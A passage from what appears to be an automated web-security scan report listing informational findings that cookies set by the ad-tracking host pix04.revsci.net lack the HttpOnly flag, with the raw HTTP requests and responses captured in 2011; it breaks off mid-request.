GET /A09801/b3/0/3/1008211/65654042.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnn.com%252F%253Fundefined%253Dundefined%2526_rsiL%253D0%26DM_CAT%3Dcnn%2520%253E%2520homepage%26DM_EOM%3D1&C=A09801 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; rtc_wwje=MLuBa44HgVlDFVRDdcKRB3R3EIDZKgaJBK6woh4rAtJmVgX80yTcxtVUvX+wZdfT3z9Za/2KdJo=; udm_0=MLvv8iEJPj5npx6Bo8hY2L+1+kUjsrb3zCNeeLLD9My28XeHWAmn+9uUiLtJmK0Xf/l0O0X/1QEXLQALTg9EEFT6+LvS0M0lXglFWO58f0sfMpXzDxm+S1IZqOX1U27zHDsQW85DfkLDElQZxiHk4o/4bgBacphh6513iafXO0+djO48elokzpJEwV5p+VM10YTolQIdeL+PqwoN8MZoWogMtiF4P7nOuBORNXOsEBri4O2QxDrbbsjVF6gtLc4gzm9xZHIDy/5o0mrgHflrz9L8NaQJ4pud30h65IFxZktB8T/cL3blfVZCo4zCeHwhtw8o6ke3DX1rT5v1/vZLOePywRbs0Is9YP2k//uOqA2ekuS5StfAEgkTDys/Le/wxKKupbStXd9CiIDA8mj/W2sAl+xffMJtSZ3hkNYEyWe1hCmFxLHMtn+k48ida8E/Fp5sKtJm3wMuZ8LtP/FcpQHMgHKrrjXNCaYIydhGgPmHgyI4U0uKz9He6dCPtBC5h3yc4Lqg1ID+fNKAPWC9W141XK70cpkqVKwYLOFL+yU4GITEv43m/rvhy7mVcwCxfb8Astde+mbqQ5zkJJImBbsxcaAIRVAGor/txCaGoqqROl47NOD+gvwA0LXTifL+54l7gbstyQKGqCF90Iifqi2ndawl2G8AN3IFEd84cvPFrzUi99su/ymcPLS6aGnzrsd10bSd9ebjYqlQSWj9Ns9mBrYH7MqXsYvJXK6G8pSv1oRZ2lPNiSoQ1h0JTTeR3B01HAnlPID6Ig5zd6s7JKubRt/2w7Nb6kX1pcAeFjpk+0iL7szQ4Zd/JuPVOFvnq4SC77ziTWNMXwRPQLuOtEOCfCZzUf9BTkpfuM2fh/mWqRIvXTpxN+Lnw+xMbncDk3jQACrA; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlJtLYIVF5M27L8vfsI7WByyXJ6gBlNTNwT8g7lTtVTtlUQIhMYnhGCxalPCFyDSiKJPgnHQBQDLJ3Rr4nnHKDvxdFk=; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="pUP1Jk+j/xMUlj0GV1on/PIeTeZhl/ABIuE0WATIveE06i3f0/xPmLL3uOLZaEB2f2gDfDhI1d91v5puz+N+6b+yvAo7GmaZkTq4Gm/Rw7Ljd/ZFVxiCmfHFFWQyHdzyHv/gxecfTf0/SyR1+0VhDtz2BGcpw7DrM9CfG7dEUG+QQy48Tjo3f24UO/go/049JUZhb76OoyXf/6SsReISLRGVWABNu40UtI3M+cn6gvH8m7abUkKgNwpchhscue2RqqNDoORNIyedxSKdO2NOlKUAinGJIoTupBNQ+Mx5DmeNaeEo0C/I4Kv4rHf7JrR6RNw/NPeBTYR2xzi9Zvc3zfc6z0pTOxpRBzYH4LVtkyF693p6F/duCOSgZkFoF/znm+3H1Y20oOPl3hujZdVgHeaHqj58hOdBb05PleRPZZ36jDJIVm36L6xNl1FI8WeVpkg/gaI9e6dNRG23dHY8U9IY5mfsM8xmgluUCGMJJGcMdbbvccHZIfQ7W1mES+WSeFi1NtIJhqhmsTUdSkpZWOQmgOr7GWaFoTimBcYT5OO3XglWxJ1SFjhurKeAG4O/TiN3yIsta/QyhrTL8HSpL0VaSCXDxRpybSjGaR1Kz7ZbEVRh8qCZtEprm9HQ4/pHm1U35k48q7YXQzhc4Jz4pOrCG7otKe7T9nVU5WPO3R4fXKMJaywU"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_wwje=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GS70=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqolNtlR8qmZ5EYm2QQMyGpObby6m311PsHgzv01aCKDYPpg3DclGyTfYmv4eV+B8TaeJUThNteKFr5insIjhhJfnzN2nZibloi7gRJ2YvE++wSbp+230mBtxk; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:07 GMT; Path=/
Set-Cookie: rtc_vQd1=MLuBa44HgVlDFVRDdcKRB3R3EIDZKgaJBK6woh4rAtJmVgX80yTcxtVUvX+wZdfT3z9ZvCMjShpnZzliZicNbn0rTj3r40kiIzC8bshHCjemRQboH1Al2GjhyihsVmLmviEIBiwmfPx4G76pEjpFI99QRZ8P4IFvz9JZNg==; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:07 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:45:06 GMT
Content-Length: 734

/* AG-develop 12.7.1-66 (2011-07-20 15:58:55 UTC) */
rsinetsegs=['A09801_10001','A09801_10313'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.rep
...[SNIP]...

8.45. http://pix04.revsci.net/D08734/a1/0/0/0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEDksdBQv2eRa00pZUQMZdIU&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="pUP1Jk+j/xMUlj0GV1on/PIeTeZhl/ABIuE0WATIveE06i3f0/xPmLL3uOLZaEB2f2gDfDhI1d91v5puz+N+6b+yvAo7GmaZkTq4Gm/Rw7Ljd/ZFVxiCmfHFFWQyHdzyHv/gxecfTf0/SyR1+0VhDtz2BGcpw7DrM9CfG7dEUG+QQy48Tjo3f24UO/go/049JUZhb76OoyXf/6SsReISLRGVWABNu40UtI3M+cn6gvH8m7abUkKgNwpchhscue2RqqNDoORNIyedxSKdO2NOlKUAinGJIoTupBNQ+Mx5DmeNaeEo0C/I4Kv4rHf7JrR6RNw/NPeBTYR2xzi9Zvc3zfc6z0pTOxpRBzYH4LVtkyF693p6F/duCOSgZkFoF/znm+3H1Y20oOPl3hujZdVgHeaHqj58hOdBb05PleRPZZ36jDJIVm36L6xNl1FI8WeVpkg/gaI9e6dNRG23dHY8U9IY5mfsM8xmgluUCGMJJGcMdbbvccHZIfQ7W1mES+WSeFi1NtIJhqhmsTUdSkpZWOQmgOr7GWaFoTimBcYT5OO3XglWxJ1SFjhurKeAG4O/TiN3yIsta/QyhrTL8HSpL0VaSCXDxRpybSjGaR1Kz7ZbEVRh8qCZtEprm9HQ4/pHm1U35k48q7YXQzhc4Jz4pOrCG7otKe7T9nVU5WPO3R4fXKMJaywU"; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5; udm_0=MLv3MlMJbipn3hddo59fs/SyNUtp5oKbu+uMI45hFi1crut9DVZMSamSoBVFCRxGD5SIkS4D7WfwauVpCTw0Isk0omPT0Tbv5GMpHBVB5rNOJAP4+C/tdjadkIbYlgmXsvl6af2CYfyHx2Fc+fRI8l8hGsZQqzcAo9lQzfSm2W7ZzyQXi8WYBorNSmxkYhQQXoywAu4JjybHNxA3t69iOVyMFgoFtx1G/VLYBy2ckaOoIQANfyMKcxP+UxT3Jn7P4wgAXpu0VTPkD4N5Z7K5WidIL2L5CilY1JqslKzE1ji3W1NeFMNO9ouAijnMUhpLIVh5wexNmEO3xoxjurbe12d4EQTAQ1G4O83w0kkywHJkZ1lvDa2U/gabuvnh/a86fltTRfLC3hgQT1+ehya+ibS7NOm3Y5T9p8T7r/AVRBZmMv3ogwezAVJC8s917JE07Dl8h/jQa7j7YBBTA93WrD9BJxYWTizsonoEB5WYcFmoBk/QId91CBBXcNILKxWwqSlhyjf5AErwWPLcfEAzsTQHJhcE872Jv+ZsdTpn1XyyT4bxukBDSZGRGTw0JMZSAkdPpjsRpybMNOwZ45B6dz5MC8RRJC3Kw1+MYuyweXCNUfFJ+VnaC6FHXV8riDUULFwCNAkI0TBq/shPPICat0erHDyNmoHVEonAj7l/5KN2SAKTcTMj7DDCojn89lrgiziLJdzwDCQjximaGJ+Nnxrcl/1E44fQiTP3paeTq07w6gsCZ92FCh2OqI1FXjN+gGqWy96fehBxvVzyr2BCrWzzA8v/EaON+tZSngXUhs+gYtzqUC+NV5qgUMV79w2XXRs69BtEX8wQY2e5/7+uuwt/geJdkgLt+QIOeRPgN7x9GitTgNaD6po3S0xQCItbkSjDvL37sQk3aKzGbbygzKFbzZytJy71bToQRbkka+9nlHboploKpgM3NJ7Rxi+REO75GUPPOPr+TDJsqqT8vnWgeONaddsTuhm0tX3zgEmMZ6FK+6c=; rsi_segs_1000000=pUPFJ0OhbgIMV5/4eRtDiz+77hsEU4sbyGIEQahp+sZykmOIPiEcz5NLjlK+OXZFXqAWbjRJXKG7UB/FoDWgm0tKyf0YP+Sv7u97rS5K8ImyDyrPSVO53vGYk8sqcD4gJ57p3A0b720jN8kTZRve2URA5/fruwm/vxXtwIi+6dJEhin+St3tJY8IuYk+mWPlNAvvQAE/VZPYblTaBC1vuihZUSskJphr97knN55mqiRwMLZ7f87oEfK6IK4krR4WrBTXqfEnLgsVirq40wjSamQ7HZbK3peV; rtc_KRSP=MLsvsdMvcT5jJQFEAxfg5uGCTOTuBKNAOyt+DH4Bad/qovyoL49o4EPgY5Q4cI6RKcj64uvtSDRfNNB59eQ6Atd9wwdJEBWHlJQQBQfPVsTJRE2friaxhIUHTb7Qt1Ld/Cxp0FbzwtFb7pvGD3flQnhCen5fhm40KdQTNKd0BhVumNQxeVXBOaSUUi0DPbnjteE8uOF+taOLv5cuwBtgWs2VBSLKJJI+/D2BTolIhikecvQJGnJiTYruoWPKVF7XhgBQYjk901Nby0eWB5RIJ84C8mWfyvcVXVJtQPbBUsmdD30aC5VeOASORa8sSaWEYhovHMuA9GwKfe8uNvlO2MnIU8ovF4QfjAY24++o18YO7jjfvmCoTj0y3vvcTY6/00zokbWg+d6SeODWzcQ=; NETSEGS_H07710=0a29f867077d7a4f&H07710&0&4e6e5361&0&&4e488f9e&eb0686832faccc361b6bf55e98e31ad5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0+FrwIQlbWdY9tIJXlrW7glQxHOWAfAxbNrOLxUG7W+7rNyz+N5XuHolMsqIjEUlDxmqri7uMRwZ3vWVdDTEjLRvwOsNhmbcXWbqW2OMjvmS5/RVljgi+sITAC+rxapnI2A7+Y9dRhE7+CdjvL08o80TglhkXbRsoogs76r1im6xyxAzTbCjnhsfshkMzqiXR7b8Uic7kvj1aaa643hRRxxVxxLA+l+NkD8l4jdy/Ejqcv65zrHJIUHrXgXqNA5mMl3cv+lfp4bN+30AWy6HpwhzJeR; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:59 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39VEJLipj5t7J7tE47oWpHVhV4iFKGwwYtTiEeC08oMyBjaxxWiBni1QM1E2Pks7el1ydHSgFQGjjMeoVcyJZKquGLaDjIj9K/N7n8rHUJXrKMqKD7tavf3vT+2m1B9y4ATIJFGQdv5PA+At3K1fRBsTt9LrUfj0ladGeLVtCR6rwq9BG2ZKYFSaUl4t2ga11Fla/Q79wP7/FSOjVw+HRXN75eYiCsUdB4bwFTrG2ibyEVy/OlkNmi5Z5PETokXXdFGebgKbyDKYERcHK3nVIeRjWYaVDb46sPxdyvdasXi2JnwD9jkrLIv25wjkK2nUdQvMmikpnQfi3fBmN/lk+t/SILnsGxQna5RYckreoyf+Z/StFdx0LnMCDRkadLDc8meOGYQQDtDmMvXQyhaOO/JyP8qc1baN0fiCRLkfeiqcOqWibTCSrCqH3S5rq9kCx1XLH34waQbT3niPoP+3uyQvE1ejxIVTsAMLb6St2zly8uIuZDJ7xz+Pjie/lt0fXdBtBwfgnhIssvXYNXS55QFWeaaUF1vh3b1MYbz0hqkhZp4kxFvSraUkAaypu4TMMQ1zeR+ADls8Xmz9t97BM5jZfVsfs3bDjQUi6MmQ8INj77j+Yy/5b6DbKGOn98XhKBgzcVnJPY0MMwiEE6NhAM9Um1DFpS7nafdpH3jKMrtxe8TdlEuNtsCq6lqpyttc6oHNtDTP95/YbToh7L0r/mwcehqevH6xCGWRPIjly+Et5++Bkt8xBoV/enJdW8fCum9jV8gu5iBgG43lbiS0E5vZTJFT91ieqHsB4rKadXqbXAcV3l3V6SU6ThBT+xNgEIst6Zwmh6ciwYys15HyWnPiEmcRQ2v9EVLRR673MnMbKi3VuZqUndnochcxg4BCsxtWq7LMUqzyHqo0w0kpKIXep9fTXnHU2KwRta3hQN8O1WHTVeltJA9lNLe5fRkEXE52y/GcRD6yyHmZb2ipgt5TU6ji0xHXcjarkL76NjZVbAPAmI5AhaUa0m/yDRoP5J/Z4fp/e+kKYI+tQFFTu8w8FbXZUrT4V/ys8P2FfmKyZcbAzKyRy3AycaRQY0L0=; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:59 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 15 Aug 2011 18:45:59 GMT

GIF89a.............!.......,...........D..;

8.46. http://pix04.revsci.net/H07710/b3/0/3/1008211/160487930.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/1008211/160487930.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/1008211/160487930.js?D=DM_LOC%3Dhttp%253A%252F%252Fmoney.cnn.com%252F2011%252F08%252F15%252Fmarkets%252Fmarkets_newyork%252Findex.htm%253Fhpt%253Dhp_t2%2526_rsiL%253D0%26DM_CAT%3DCNNMoney%2520%253E%2520Markets%2520%253E%2520Markets%26DM_REF%3Dhttp%253A%252F%252Fwww.cnn.com%252F%26DM_EOM%3D1&C=H07710 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="pUP1Jk+j/xMUlj0GV1on/PIeTeZhl/ABIuE0WATIveE06i3f0/xPmLL3uOLZaEB2f2gDfDhI1d91v5puz+N+6b+yvAo7GmaZkTq4Gm/Rw7Ljd/ZFVxiCmfHFFWQyHdzyHv/gxecfTf0/SyR1+0VhDtz2BGcpw7DrM9CfG7dEUG+QQy48Tjo3f24UO/go/049JUZhb76OoyXf/6SsReISLRGVWABNu40UtI3M+cn6gvH8m7abUkKgNwpchhscue2RqqNDoORNIyedxSKdO2NOlKUAinGJIoTupBNQ+Mx5DmeNaeEo0C/I4Kv4rHf7JrR6RNw/NPeBTYR2xzi9Zvc3zfc6z0pTOxpRBzYH4LVtkyF693p6F/duCOSgZkFoF/znm+3H1Y20oOPl3hujZdVgHeaHqj58hOdBb05PleRPZZ36jDJIVm36L6xNl1FI8WeVpkg/gaI9e6dNRG23dHY8U9IY5mfsM8xmgluUCGMJJGcMdbbvccHZIfQ7W1mES+WSeFi1NtIJhqhmsTUdSkpZWOQmgOr7GWaFoTimBcYT5OO3XglWxJ1SFjhurKeAG4O/TiN3yIsta/QyhrTL8HSpL0VaSCXDxRpybSjGaR1Kz7ZbEVRh8qCZtEprm9HQ4/pHm1U35k48q7YXQzhc4Jz4pOrCG7otKe7T9nVU5WPO3R4fXKMJaywU"; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5; rtc_KRSP=MLsvsdMvcT5jJQFEAxfg5uGCTOTuBKNAOyt+DH4Bad/qovyoL49o4EPgY5Q4cI6RKcj64uvtSDRfNNB59eQ6Atd9wwdJEBWHlJQQBQfPVsTJRE2friaxhIUHTb7Qt1Ld/Cxp0FbzwtFb7pvGD3flQnhCen5fhm40KdQTNKd0BhVumNQxeVXBOaSUUi0DPbnjteE8uOF+taOLv5cuwBtgWs2VBSLKJJI+/D2BTolIhikecvQJGnJiTYruoWPKVF7XhgBQYjk901Nby0eWB5RIJ84C8mWfyvcVXVJtQPbBUsmdD30aC5VeOASORa8sSaWEYhovHMuA9GwKfe8uNvlO2MnIU8ovF4QfjAY24++o18YO7jjfvmCoTj0y3vvcTY6/00zokbWg+d6SeODWzcQ=; NETSEGS_H07710=0a29f867077d7a4f&H07710&0&4e6e5361&0&&4e488f9e&eb0686832faccc361b6bf55e98e31ad5; rsi_segs_1000000=pUPNJ0OBb3IMlZ94u+w/RLtOeq6V5KAP0RzRZ4VoCwEqMnGBvEAYmwLmqlJ+uVZFlCQhi2DTJKCiIwSrVODkg8DOMr2FtOMOhsfXMZJDruSUOybqHTG7OdUgyGlvam+0r/hCGF9SUcx9trlZ2R1UiUGH5Qr3qJwzqIIgxHeHJzlCUNIrUDc3E0DGvDB1Due56aoDfTtsUAvrJBIV+VMyr28TPp9h2EgqBqmPHQ4/QkU7ToIsqEmaBWs4qU+ibe/AgxY65bRY3PgnEhFuZ8ituuI0pf4/; udm_0=MLv39VEJLipj5t7J7tE47oWpHVhV4iFqWs1UADzreS08oMyBLZiQ7/IgF+mtwZz2GKy4+/oF2cXMwGfmQ+puGj0icMf9YSUlG8hBLlKT5bdrJyR1VwivS77kL8KwjZx/kq8f1b+ptJvRb92gRkQC10QBYhzOxeAA4t05okQ1vwvOC/MdF8aNtOattJB4BH6sUTLj9hrmTZcwDP87WvvAJbVX0LupWuCVs8gx1V/ZmPC7LRHPW4PR+iuv7aYhFgD9wfnjztDwaG6b9CxkAa0cdnR4lRN+7gZylWqdq7xeQ9oFzZ2jKT6MR0A24KWReJnCOFpT5CKfSE5C+7gHDpCp74+AOrGC40O3WD0K21wfHxAvqU+5OFIyWhqb1JZ6b54vODeO/poyVR+sfMuoYDaQz1c/noivrxBx8HVtN9RpUskOMjKAS5hDL7xXvSSLif2z6gaq6Li/Bl1yDCYT1Kx8Zi+k8PE0NK17+g7Qszuoyf4xyUaEs9w3vls4/tjpVnAH7fEczf6he3j0ktwTOoUhdATmjYDKWbSuR3daqd7SHWQYd6hsJJ7EVlY5OiuqCtM8YdfswSzSaeiANfOjPFq3o3iGiPFrNq2+oCFy8gHH/wjz/KX3qt+7PHgvCRhapigk4OBV5X7z+X5hK6gNdCfqzyl2QkksyVe18s06mVLBMJmKDn+qTW5VNJi6BYULvCoFCzW1T0TOMers4QZS2zk87dnZvJSz9lu1+yWPUh8o+9cSEkrTJ9rlC80+v4iPzjF9joWN7TzPOdGxbT66+Jl4BTN1QZbW2cNFZzfs9p8P99qk6S++Kn6CIsdxGZgsx38x1gDRGm3hsoyYIY5ShcIyy1iInLcHslA9KfR2Bm2jv/SXIhDGobwblbpGwg1MO4cb44LctZuM5Y7BMtxM+7FIqCVx9BkWWQAcIHTwa6aaOAT0WolwZnVmCAgQzgZq+0hCVCs8nrHzbAYSoOFfdUycbXWgkMHeEbfHehedv9j8H5ieiBwVp0I2rAx6RVuQ655Z0Lg0+T05in1TDNbFcwGVLD1c0Gom4+qjjFRfQMWvz/8eBID0Hc3+AuEu891qYjrHrw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_KRSP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wwje=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GS70=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_w54y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0mBrwIMl594t637ir+57hsEDi5DEqzNkX2Ik9r5vw/ZgiF1vYNLjlK+Gc3/wmdDu6L/9Qgl4QT2DtLd8wxbiYqEeUUcnSXAMDKpnuGVNbHhRJLkXsWt8MvKd907Jx5GmxTcEC6fZjpEfcaKc1UvS9SSfDAuTU2Ck0ob0vjiUv367HU0+wjcuWheEBkx9ujpR9Hc4N6M2voeXCzlVjjPKvtnx8DbWJKCGu9dx1UdYuUp5TrBjYjr0Lf0NjQ/AO5hQa4ByzC+PstKvSjWycRXmphgeZZt; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:46:56 GMT; Path=/
Set-Cookie: rtc_uDs4=MLsvsVEuMD5rJhHcH4/cwKoVTCR+lWjDJl+BFHwKiypaYzCUWk4NDAY0SGU5WbrwNTw5e3gnkqviZlPtf0a8KBkcx6pLq5/dsfXHzparj9vvCUNa+IMou8lvD/lyMqPeFrVkzdFCpZXRXPDGjAgkpGpgw5KA0h0Io1kDndlNAwjhAaTb5lCG0x9hFuchMtByn0fcXZ2uoDhaLYF0VwrLJI+k95+3mSCZrFqUwFJMXz1kRUqDh56X96i+nSdcfgAqKJlqhhwJLvUrHfyyq/xUQcjxrJ+Bl8nadDAKrkbaT0sgAhWAB7gesNoT8pnkcxlNSLt3gMNq8ae1V1GwMOCQEED0DuQ5q5uqdpwo7m2TYq+cq+GSxCffrlmxymFMQv7925F7vYVxiVvilSUfRGc2PLlxkeRcJr2zYareidrpeZNlwUc=; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:46:56 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:46:56 GMT
Content-Length: 1550

/* AG-develop 12.7.1-66 (2011-07-20 15:58:55 UTC) */
rsinetsegs=['H07710_10515','H07710_10541','H07710_10343','H07710_10458','D08734_72639','H07710_50001','H07710_50002','H07710_50006','H07710_50005',
...[SNIP]...

8.47. http://pix04.revsci.net/H07710/b3/0/3/1008211/784372322.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/1008211/784372322.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/1008211/784372322.js?D=DM_LOC%3Dhttp%253A%252F%252Fmoney.cnn.com%252F2011%252F08%252F15%252Ftechnology%252Fgoogle_motorola%252Findex.htm%253Fhpt%253Dhp_t2%2526_rsiL%253D0%26DM_CAT%3DCNNMoney%2520%253E%2520Technology%2520%253E%2520Technology%26DM_REF%3Dhttp%253A%252F%252Fwww.cnn.com%252F%26DM_EOM%3D1&C=H07710 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; 